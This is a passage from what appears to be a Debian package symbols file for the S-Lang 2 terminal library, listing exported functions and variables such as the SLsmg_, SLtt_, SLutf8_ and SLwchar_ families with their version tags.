SLsmg_set_screen_start@SLANG2 2.2.4 SLsmg_set_terminal_info@SLANG2 2.2.4 SLsmg_strbytes@SLANG2 2.2.4 SLsmg_strwidth@SLANG2 2.2.4 SLsmg_suspend_smg@SLANG2 2.2.4 SLsmg_touch_lines@SLANG2 2.2.4 SLsmg_touch_screen@SLANG2 2.2.4 SLsmg_utf8_enable@SLANG2 2.2.4 SLsmg_vprintf@SLANG2 2.2.4 SLsmg_write_char@SLANG2 2.2.4 SLsmg_write_chars@SLANG2 2.2.4 SLsmg_write_color_chars@SLANG2 2.2.4 SLsmg_write_nchars@SLANG2 2.2.4 SLsmg_write_nstring@SLANG2 2.2.4 SLsmg_write_raw@SLANG2 2.2.4 SLsmg_write_string@SLANG2 2.2.4 SLsmg_write_wrapped_string@SLANG2 2.2.4 SLsnprintf@SLANG2 2.2.4 SLstack_depth@SLANG2 2.2.4 SLstack_exch@SLANG2.3.0 2.3.0 SLstrcmp@SLANG2 2.2.4 SLstrcpy@SLANG2 2.2.4 SLstrncpy@SLANG2 2.2.4 SLstruct_create_struct@SLANG2 2.2.4 SLsystem@SLANG2 2.2.4 SLsystem_intr@SLANG2.2.0 2.2.4 SLtt_Baud_Rate@SLANG2 2.2.4 SLtt_Blink_Mode@SLANG2 2.2.4 SLtt_Force_Keypad_Init@SLANG2 2.2.4 SLtt_Graphics_Char_Pairs@SLANG2 2.2.4 SLtt_Has_Alt_Charset@SLANG2 2.2.4 SLtt_Has_Status_Line@SLANG2 2.2.4 SLtt_Ignore_Beep@SLANG2 2.2.4 SLtt_Newline_Ok@SLANG2 2.2.4 SLtt_Num_Chars_Output@SLANG2 2.2.4 SLtt_Screen_Cols@SLANG2 2.2.4 SLtt_Screen_Rows@SLANG2 2.2.4 SLtt_Term_Cannot_Insert@SLANG2 2.2.4 SLtt_Term_Cannot_Scroll@SLANG2 2.2.4 SLtt_Try_Termcap@SLANG2 2.2.4 SLtt_Use_Ansi_Colors@SLANG2 2.2.4 SLtt_Use_Blink_For_ACS@SLANG2 2.2.4 SLtt_add_color_attribute@SLANG2 2.2.4 SLtt_beep@SLANG2 2.2.4 SLtt_begin_insert@SLANG2 2.2.4 SLtt_bold_video@SLANG2 2.2.4 SLtt_cls@SLANG2 2.2.4 SLtt_del_eol@SLANG2 2.2.4 SLtt_delete_char@SLANG2 2.2.4 SLtt_delete_nlines@SLANG2 2.2.4 SLtt_disable_status_line@SLANG2 2.2.4 SLtt_enable_cursor_keys@SLANG2 2.2.4 SLtt_end_insert@SLANG2 2.2.4 SLtt_erase_line@SLANG2 2.2.4 SLtt_flush_output@SLANG2 2.2.4 SLtt_get_color_object@SLANG2 2.2.4 SLtt_get_screen_size@SLANG2 2.2.4 SLtt_get_terminfo@SLANG2 2.2.4 SLtt_goto_rc@SLANG2 2.2.4 SLtt_init_video@SLANG2 2.2.4 SLtt_initialize@SLANG2 2.2.4 SLtt_is_utf8_mode@SLANG2 2.2.4 SLtt_narrow_width@SLANG2 2.2.4 SLtt_normal_video@SLANG2 2.2.4 SLtt_putchar@SLANG2 2.2.4 SLtt_reset_scroll_region@SLANG2 2.2.4 SLtt_reset_video@SLANG2 2.2.4 SLtt_reverse_index@SLANG2 2.2.4 SLtt_reverse_video@SLANG2 2.2.4 SLtt_set_alt_char_set@SLANG2 2.2.4 SLtt_set_color@SLANG2 2.2.4 SLtt_set_color_fgbg@SLANG2 2.2.4 SLtt_set_color_object@SLANG2 2.2.4 SLtt_set_cursor_visibility@SLANG2 2.2.4 SLtt_set_mono@SLANG2 2.2.4 SLtt_set_mouse_mode@SLANG2 2.2.4 SLtt_set_scroll_region@SLANG2 2.2.4 SLtt_set_term_vtxxx@SLANG2 2.2.4 SLtt_smart_puts@SLANG2 2.2.4 SLtt_tgetent@SLANG2.2.3 2.2.4 SLtt_tgetflag@SLANG2 2.2.4 SLtt_tgetnum@SLANG2 2.2.4 SLtt_tgetstr@SLANG2 2.2.4 SLtt_tgoto@SLANG2.2.3 2.2.4 SLtt_tigetent@SLANG2 2.2.4 SLtt_tigetnum@SLANG2 2.2.4 SLtt_tigetstr@SLANG2 2.2.4 SLtt_tputs@SLANG2.2.3 2.2.4 SLtt_utf8_enable@SLANG2 2.2.4 SLtt_wide_width@SLANG2 2.2.4 SLtt_write_string@SLANG2 2.2.4 SLtt_write_to_status_line@SLANG2 2.2.4 SLtty_set_suspend_state@SLANG2 2.2.4 SLuchar_apply_char_map@SLANG2 2.2.4 SLutf8_bskip_char@SLANG2 2.2.4 SLutf8_bskip_chars@SLANG2 2.2.4 SLutf8_compare@SLANG2 2.2.4 SLutf8_decode@SLANG2 2.2.4 SLutf8_enable@SLANG2 2.2.4 SLutf8_encode@SLANG2 2.2.4 SLutf8_encode_null_terminate@SLANG2 2.2.4 SLutf8_extract_utf8_char@SLANG2 2.2.4 SLutf8_is_utf8_mode@SLANG2 2.2.4 SLutf8_skip_char@SLANG2 2.2.4 SLutf8_skip_chars@SLANG2 2.2.4 SLutf8_strlen@SLANG2 2.2.4 SLutf8_strlo@SLANG2 2.2.4 SLutf8_strup@SLANG2 2.2.4 SLutf8_subst_wchar@SLANG2 2.2.4 SLvsnprintf@SLANG2 2.2.4 SLwchar_add_range_to_lut@SLANG2 2.2.4 SLwchar_allocate_char_map@SLANG2 2.2.4 SLwchar_apply_char_map@SLANG2 2.2.4 SLwchar_bskip_range@SLANG2 2.2.4 SLwchar_create_lut@SLANG2 2.2.4 SLwchar_free_char_map@SLANG2 2.2.4 SLwchar_free_lut@SLANG2 2.2.4 SLwchar_in_lut@SLANG2 2.2.4 SLwchar_isalnum@SLANG2 2.2.4 SLwchar_isalpha@SLANG2 2.2.4 SLwchar_isblank@SLANG2 2.2.4 SLwchar_iscntrl@SLANG2 2.2.4 SLwchar_isdigit@SLANG2 2.2.4 SLwchar_isgraph@SLANG2 2.2.4 SLwchar_islower@SLANG2 2.2.4 SLwchar_isprint@SLANG2 2.2.4 SLwchar_ispunct@SLANG2 2.2.4 SLwchar_isspace@SLANG2 2.2.4 SLwchar_isupper@SLANG2 2.2.4 SLwchar_isxdigit@SLANG2 2.2.4 SLwchar_set_wcwidth_flags@SLANG2 2.2.4 SLwchar_skip_range@SLANG2 2.2.4 SLwchar_strtolut@SLANG2 2.2.4 SLwchar_tolower@SLANG2 2.2.4 SLwchar_toupper@SLANG2 2.2.4 SLwchar_wcwidth@SLANG2 2.2.4 _pSLChg_LCase_Lut@SLANG2 2.2.4 _pSLChg_UCase_Lut@SLANG2 2.2.4